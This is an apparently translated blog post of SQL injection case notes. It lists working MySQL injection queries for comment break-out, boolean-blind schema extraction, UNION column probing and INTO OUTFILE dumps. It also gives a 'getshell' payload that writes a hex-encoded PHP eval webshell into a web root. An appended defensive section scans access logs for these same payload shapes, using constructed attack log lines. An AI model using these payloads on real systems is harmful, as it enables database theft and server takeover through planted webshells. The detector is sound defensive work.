
SQL injection case notes

Author: 木头石头锤子 | Source: published 2017-05-11 11:36, read 0 times

    Test as follows:

    select * from sdb_b2c_orders where order_id = '201610081070741' and (select * from sdb_b2c_members)#' and member_id = '13950'


    Whether this statement returns rows tells you the ASCII code of the first letter of the database (schema) name being guessed:

    select * from ds.destoon_ad where aid = 2 AND ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1),1,1)) > 112;

    121

    select ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1),1,2))

    SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1

    select IFNULL(CAST(schema_name AS CHAR),CHAR(32)) FROM information_schema.SCHEMATA limit 21,1

    The information_schema.SCHEMATA table is the key.

    ASCII table: http://ascii.911cha.com/

    Guessing the number of columns in the table:

    Ten columns guessed in total; as in sqlmap:

    select * from ds.destoon_ad where aid = 2 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,NULL,NULL,NULL,NULL,NULL,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL,NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL--

    select count(*) from information_schema.columns where table_schema='ds' and table_name='destoon_ad'

    Dumping the data directly:

    SELECT title,pid,typeid INTO OUTFILE 'tmp.txt' FIELDS TERMINATED BY ',' OPTIONALLY ENCLOSED BY '"' LINES TERMINATED BY '\n' FROM destoon_ad;

    Even when the code reports no errors, injection is still possible: the sleep function does the work for you.

    Time-based blind SQL injection:


    How sqlmap works:

    It compares the response returned for a true condition with the response returned for a false condition.


    SELECT ORD(MID((SELECT DISTINCT(IFNULL(CAST(schema_name AS CHAR),CHAR(32))) FROM information_schema.SCHEMATA LIMIT 21,1),3,1))

    High-impact getshell script; the precondition is that you know where the site's web root is:

    select * from destoon_ad where aid = 2 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,1,2,3,4,0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e into outfile 'D:/serversoft/upupw/5.6/htdocs/alipay/cc.php'
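    From the defender's side, the queries above (boolean-based extraction via ORD(MID(...)) over information_schema.SCHEMATA, UNION ALL SELECT NULL column probing, INTO OUTFILE, SLEEP-based timing, and the quote-plus-comment break-out) all leave distinctive traces in a web server's access log. The following detector is an added example, not code from the original post; the log lines, IPs and signature names are constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Heuristic signatures for the techniques walked through in the notes above.
SIGNATURES = {
    # boolean-based ASCII extraction: ORD(MID((SELECT ... FROM information_schema.SCHEMATA ...)))
    "boolean_blind_schema_extraction": re.compile(
        r"ORD\s*\(\s*MID\s*\(.*?information_schema\.SCHEMATA", re.I | re.S),
    # column-count probing: UNION [ALL] SELECT NULL, NULL, NULL, ...
    "union_column_probe": re.compile(
        r"UNION\s+(?:ALL\s+)?SELECT\s+NULL(?:\s*,\s*NULL){2,}", re.I),
    # file write; needs the FILE privilege and a path allowed by secure_file_priv
    "into_outfile": re.compile(r"INTO\s+(?:OUT|DUMP)FILE\s*'", re.I),
    "time_based_blind": re.compile(r"\b(?:SLEEP\s*\(\s*\d+|BENCHMARK\s*\()", re.I),  # SLEEP(n)
    "quote_comment_truncation": re.compile(r"'[^']*(?:#|--\s|/\*)", re.S),  # ' ... then # -- /*
}
REQUEST_LINE = re.compile(r'"(?:GET|POST)\s+(\S+)\s+HTTP/')

# Constructed access-log lines (not from the original post): one benign request,
# then one request per technique against the same parameters the notes target.
SAMPLE_LOG = [
    '10.0.0.5 - - [11/May/2017:11:36:01 +0800] "GET /ad.php?aid=2 HTTP/1.1" 200 812',
    '10.0.0.9 - - [11/May/2017:11:36:02 +0800] "GET /ad.php?aid=2%20AND%20ORD(MID((SELECT'
    '%20DISTINCT(IFNULL(CAST(schema_name%20AS%20CHAR),CHAR(32)))%20FROM%20information_schema'
    '.SCHEMATA%20LIMIT%2021,1),1,1))%3E112 HTTP/1.1" 200 812',
    '10.0.0.9 - - [11/May/2017:11:36:03 +0800] "GET /ad.php?aid=2%20UNION%20ALL%20SELECT'
    '%20NULL,NULL,NULL,NULL,NULL-- HTTP/1.1" 200 812',
    '10.0.0.12 - - [11/May/2017:11:36:04 +0800] "GET /order.php?order_id=201610081070741'
    "'%20AND%20SLEEP(5)%23 HTTP/1.1\" 200 812",
    '10.0.0.12 - - [11/May/2017:11:36:05 +0800] "GET /ad.php?aid=2%20INTO%20OUTFILE'
    "%20'/tmp/dump.txt'%23 HTTP/1.1\" 200 812",
]

def classify_request(raw_query):
    """Return the technique names whose signature matches the decoded query string."""
    decoded = unquote_plus(unquote_plus(raw_query))  # two passes catch double encoding
    return [name for name, rx in SIGNATURES.items() if rx.search(decoded)]

def scan_access_log(lines):
    """Map each client IP that sent a suspicious request to the techniques observed."""
    findings = {}
    for line in lines:
        m = REQUEST_LINE.search(line)
        if not m or "?" not in m.group(1):
            continue
        hits = classify_request(m.group(1).split("?", 1)[1])
        if hits:
            findings.setdefault(line.split(" ", 1)[0], set()).update(hits)
    return findings
```

    The signatures are deliberately narrow heuristics for the payload shapes in these notes; POST bodies and parameterized queries on the application side (the actual fix for the order_id / member_id and aid parameters) are outside what the log scan covers.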


Article link: https://www.haomeiwen.com/subject/rddxattx.html